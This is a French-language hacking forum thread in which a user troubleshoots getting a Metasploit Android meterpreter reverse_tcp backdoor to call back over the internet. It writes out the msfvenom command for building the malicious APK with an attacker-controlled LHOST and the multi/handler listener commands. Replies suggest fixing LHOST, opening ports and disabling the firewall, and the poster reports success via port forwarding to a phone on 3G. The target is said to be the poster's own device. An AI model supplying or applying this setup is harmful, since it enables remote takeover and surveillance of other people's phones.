Annonce

Réduire
Aucune annonce.

Besoin d'aide - configuration payload WAN avec Proxy

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Besoin d'aide - configuration payload WAN avec Proxy

    Bonjour

    Cela fait quelques jours déjà que je cherche solution à mon "problème" sans résultat. Je pense que la communauté de Hackademics sera m’aiguiller.
    J'ai déjà configuré un payload pour android avec Metasploit qui fonctionne en LAN. Jusque-là pas de souci.
    C'est quand je veux aller plus loin et tester sur le réseau WAN que se coince. Je vais essayer de vous expliquer comment je procède

    Je suis sur kali Linux 2.0, à ma disposition j'ai mon Pc portable (l’attaquant), mon smartphone android (la victime). Je dispose également d'un proxy Pptp gratuit (histoire d'avoir un Ip static).

    Pour creer mon payload je fais :
    Code PHP:
    msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip de mon proxyLPORT=443 R app.apk 
    Ensuite je le récupère l'apk que j'installe sur le smartphone.

    Reste plus qu'à récupérer le signal :
    Code PHP:
    msfconsole
    ~ use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST [ip du proxy]
    set LPORT 443
    exploit 
    Et là j'obtiens :
    Code PHP:
    Handler failed to bind to xx.xxx.xxx.xxx:443
    Started reverse handler on 0.0.0.0
    :443
    Starting the payload handler
    ... 
    Selon moi le problème ne peut venir que de deux facteurs, l'ip et/ou le port. J'ai essayé sans le proxy (donc avec mon Ip internet), avec d'autres ports mais rien n'y fait.

    Au final je pense que je peux résumer mon problème en une question : Comment configurer un payload en WAN avec un proxy Pptp ?

    J’espère avoir été clair dans mes explications et avoir donné assez de détail. Si quelqu’un à la solution je lui en serai reconnaissant

    K4LIN00B
    Dernière modification par K4LIN00B, 28 octobre 2015, 19h15.

  • #2
    Apparemment LHOST devrait correspondre à l'IP local de l'attaquant. Après je ne comprends pas bien pourquoi et je t'avoue que je ne suis pas très bien avancé quant à l'utilisation de Msf, donc quelqu'un d'autre saura très certainement mieux te renseigner que moi
    Qui est le maître, le peintre ou le faussaire... ?

    ㅡ La solidité d'une chaine est égale à la solidité de son maillon le plus faible ㅡ

    Commentaire


    • #3
      Le souci semble provenir de ton Ip proxy à partir du LHOST. Si le backdoor est sur l'appareil et que le port est respecter , et surtout qu'il est open (voire changer de port au cas ou genre tester sur 4488, ou un autre), il n'y a pas de raison que cela ne fonctionne pas.

      Pour moi cela vient d'un problème de communication réseau. Ensuite, je ne voie pas l'intérêt de WAN, LAN,MAN ? Il s'agit d'un backdoor qui va créer une tunnelisation inverse entre l'emmetteur et le récepteur, il suffit simplement d'avoir deux liaisons en marche et un port d'écoute open.

      Tu n'a pas besoin de -p pour créer ton payload. Il sait qu'il s'agit de la commande de création. Refait tout en reprenant de zéro et reprend le port car en passant par un proxy tu joue la dessus.

      C'est un peu le principe de skype, les utilisateurs sont sur écoute du port 80, lorsqu'il envoie WAMP sur le même port en fait ils leur disent qu'ils sont déjà sur écoute d'où une erreur. A ce moment là, en changeant le port, il résoud le problème. All right

      PS: pense à désactiver le pare feu

      Bonne chance.
      Dernière modification par DreAmuS, 29 octobre 2015, 13h21.

      Commentaire


      • #4
        Déjà merci pour vos réponses

        Effectivement je pense que le problème vient du port qui est sans doute pas ouvert. Je vais tester avec en ouvrant des ports. Pourtant il me semble que le port 443 est ouvert de base nan ? http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/.

        J'ai accès aux paramètres de ma Livebox donc je vais pouvoir configurer tout ça.

        Quand je dit réseau WAN je veux parler d'interne.

        Je vous tient au courant quand j'ai du nouveau

        Commentaire


        • #5
          J'ai réglé mon problème ! Mais sans le proxy pour l'instant.

          J'ai créer un payload avec comme LHOST mon ip public

          J'ai ensuite redirigé le port 4488 sur mon ip local et c'est avec cette ip que je me suis connecté à metasploit !
          Mon portable est connecté en 3G et j'ai quand même reçu le signal

          Pour que sa fonctionne avec le proxy il me suffira juste de créer un payload avec l'ip du proxy comme LHOST je pense.

          Bon bah merci pour vos conseilles les gars

          Commentaire


          • #6
            De rien, tout à fait tu a compris le principe pour le proxy comme je l'ai dit il faut le connecter avec son port. Pour cela tu a des commandes sous linux ou windows genre Netcat. Familiarise toi avec ce petit utilitaire de commande qui va te faliciter la vie pour identifier les ports et les IP concernés, il a en outre d'autres fonctions beaucoup plus poussé qui te permettront de bosser directement sur les sockets.

            Voila passe une bonne soirée.

            Commentaire

            Chargement...
            X